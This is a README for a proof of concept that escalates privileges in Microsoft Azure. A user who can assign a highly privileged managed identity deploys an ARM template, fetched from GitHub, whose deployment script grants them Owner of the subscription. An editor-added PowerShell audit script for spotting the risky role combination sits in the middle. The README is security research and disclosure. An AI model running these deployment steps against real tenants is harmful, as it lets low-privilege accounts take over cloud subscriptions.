securehats / miaow

Project Miaow is a proof of concept to escalate privileges in Microsoft Azure using an ARM template deployment.

Project Miaow (Managed Identity Adds Owner)


Mr. KFC Harland Sanders has read and assign permissions on the user-assigned managed identity.

Custom role: User-Assigned Managed Identity User

This role only grants permission to read and assign a user-assigned managed identity, following the least privilege principle.

{
    "id": "/subscriptions/7570c6f7-9ca9-409b-aeaf-cb0f5ac1ad50/providers/Microsoft.Authorization/roleDefinitions/44e27d73-8dd7-4428-8bda-78406afb75c1",
    "properties": {
        "roleName": "Managed Identity Consumer",
        "description": "",
        "assignableScopes": [
            "/subscriptions/7570c6f7-9ca9-409b-aeaf-cb0f5ac1ad50"
        ],
        "permissions": [
            {
                "actions": [
                    "Microsoft.ManagedIdentity/userAssignedIdentities/*/read",
                    "Microsoft.ManagedIdentity/userAssignedIdentities/*/assign/action"
                ],
                "notActions": [],
                "dataActions": [],
                "notDataActions": []
            }
        ]
    }
}

The user-assigned managed identity super-owner holds the User Access Administrator role on a specified scope, in this case the subscription.

Mr. Harland has Deployment Administrator permissions on a resource group, and no further permissions within the subscription.

Custom role: Deployment Administrator (permissions to create a deployment script)

This role has fewer permissions than Contributor, following the least privilege principle.

{
  "roleName": "Deployment Administrator",
  "description": "Configure least privilege for the deployment principal in deployment script",
  "type": "customRole",
  "IsCustom": true,
  "permissions": [
    {
      "actions": [
        "Microsoft.Storage/storageAccounts/*",
        "Microsoft.ContainerInstance/containerGroups/*",
        "Microsoft.Resources/deployments/*",
        "Microsoft.Resources/deploymentScripts/*"
      ]
    }
  ],
  "assignableScopes": [
    "[subscription().id]"
  ]
}

Harland has no access to the resource group where the user-assigned managed identity resides, nor to any other resource groups or resources in Azure.

Interesting note: when requesting the permissions of Mr. Harland via PowerShell, only the resource group permissions are shown. The custom role assignment on the user-assigned managed identity is not displayed.
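The following audit script is added here as an editor's example; it is not code from the miaow repository. It takes the defender's view of the two role assignments described above: which user-assigned managed identities hold a role that can write role assignments (the super-owner case), and which other principals hold the assign action on those identities (Mr. Harland's custom role). It assumes the Az.Accounts, Az.Resources and Az.ManagedServiceIdentity modules and an active Connect-AzAccount session with at least Reader on the subscription; Test-ActionMatch, Test-RoleGrants, Get-CachedRoleDefinition and Find-AssignableHighPrivilegeIdentity are names chosen for this example, and its wildcard matching is an approximation of Azure RBAC semantics rather than an Azure API.

```powershell
# Editor-added audit script; not part of the miaow repository.
# Assumptions: Az.Accounts, Az.Resources and Az.ManagedServiceIdentity are installed and
# Connect-AzAccount has been run with at least Reader on the subscription being reviewed.
# Goal: list every user-assigned managed identity that can write role assignments, together
# with the principals that are allowed to assign that identity to a resource they control.

$AssignOp    = 'Microsoft.ManagedIdentity/userAssignedIdentities/assign/action'
$RoleWriteOp = 'Microsoft.Authorization/roleAssignments/write'

function Test-ActionMatch {
    param([string]$Pattern, [string]$Operation)
    # Approximation of Azure RBAC wildcard matching (assumption, not an Azure API):
    # '*' matches any run of characters, and a '/*/' segment may also collapse to a
    # single '/', so '.../userAssignedIdentities/*/assign/action' (the form used by the
    # custom role above and by the built-in Managed Identity Operator role) matches $AssignOp.
    $regex = [regex]::Escape($Pattern) -replace '/\\\*/', '/(.*/)?' -replace '\\\*', '.*'
    return [bool]($Operation -match ('^' + $regex + '$'))
}

function Test-RoleGrants {
    param($RoleDefinition, [string]$Operation)
    # Granted when an Actions entry matches and no NotActions entry excludes it. This is what
    # separates Contributor (NotActions: Microsoft.Authorization/*/Write) from Owner or
    # User Access Administrator.
    $allowed = @($RoleDefinition.Actions    | Where-Object { Test-ActionMatch $_ $Operation }).Count -gt 0
    $denied  = @($RoleDefinition.NotActions | Where-Object { Test-ActionMatch $_ $Operation }).Count -gt 0
    return ($allowed -and -not $denied)
}

$roleCache = @{}
function Get-CachedRoleDefinition {
    param([string]$RoleDefinitionId)
    # Role definitions are looked up once per id rather than once per assignment.
    if (-not $roleCache.ContainsKey($RoleDefinitionId)) {
        $roleCache[$RoleDefinitionId] = Get-AzRoleDefinition -Id $RoleDefinitionId
    }
    return $roleCache[$RoleDefinitionId]
}

function Find-AssignableHighPrivilegeIdentity {
    foreach ($identity in Get-AzUserAssignedIdentity) {
        # 1. Does the identity's own service principal hold a role that can write role assignments?
        $privileged = @(Get-AzRoleAssignment -ObjectId $identity.PrincipalId |
            Where-Object { Test-RoleGrants (Get-CachedRoleDefinition $_.RoleDefinitionId) $RoleWriteOp })
        if ($privileged.Count -eq 0) { continue }

        # 2. Who may assign this identity? Query the identity's own resource scope (assignments
        #    inherited from the resource group and subscription are included) rather than the
        #    candidate user's assignment list, which is where a resource-scoped custom role
        #    assignment like the one in the README can otherwise be missed.
        $assigners = Get-AzRoleAssignment -Scope $identity.Id |
            Where-Object { $_.ObjectId -ne $identity.PrincipalId } |
            Where-Object { Test-RoleGrants (Get-CachedRoleDefinition $_.RoleDefinitionId) $AssignOp }

        foreach ($assigner in $assigners) {
            $who = if ($assigner.SignInName) { $assigner.SignInName } else { $assigner.DisplayName }
            [pscustomobject]@{
                Identity        = $identity.Name
                IdentityRoles   = (@($privileged.RoleDefinitionName) | Sort-Object -Unique) -join ', '
                PrivilegedScope = (@($privileged.Scope) | Sort-Object -Unique) -join ', '
                Assigner        = $who
                AssignerType    = $assigner.ObjectType
                AssignerRole    = $assigner.RoleDefinitionName
                AssignerScope   = $assigner.Scope
            }
        }
    }
}

# Each row is one principal that could reach the identity's permissions through any resource
# (such as a deployment script) that runs in that identity's context; review each row and
# remove or re-scope the assign permission where it is not needed.
Find-AssignableHighPrivilegeIdentity | Format-Table -AutoSize
```

Querying by the identity's scope rather than by the user is deliberate: the note above observes that Mr. Harland's custom role assignment on the identity does not show up when his permissions are listed, whereas the assignment is visible from the identity's side. Each reported row pairs a high-privilege identity with a principal that can attach it to a resource, which is exactly the combination this proof of concept relies on.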

Proof Of Concept

  1. Mr. Harland logs in to Azure PowerShell to deploy the template.

  2. Deploys an ARM template to the designated resource group that contains a deployment script:

     New-AzResourceGroupDeployment `
       -Name miaow `
       -ResourceGroupName kentucky-fried-veggies `
       -TemplateObject ((Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/SecureHats/azure-misfit/azurekid/priv-esc/poc/priv-esc-arm-template/azuredeploy.json').Content | ConvertFrom-Json -AsHashtable) `
       -managedIdentityName 'super-owner' `
       -managedIdentityResourceGroup "azure-misfit" `
       -principalId "301dfac7-8f45-48ac-9868-e1f0e875385c"

NOTE: I am invoking the ARM template from GitHub so the repository does not need to be cloned to execute the deployment.

Provided parameters

name:                         The display name of the deployment to the Azure Resource Group
ResourceGroupName:            The name of the resource group which the user has access to
TemplateObject:               The ARM template to deploy to the target resource group.
managedIdentityName:          The name of the managed identity with role assignment permissions on a scope
managedIdentityResourceGroup: The resource group where the managed identity resides
principalId:                  The objectId of the user that is granted permissions via the deployment script


During the deployment, a storage account, a container instance and a deploymentScript resource are created in the target resource group.

The script in the deploymentScript resource is executed in the context of the user-assigned managed identity.
After completion the deploymentScript output shows Miaow.

We are now OWNER of the subscription.
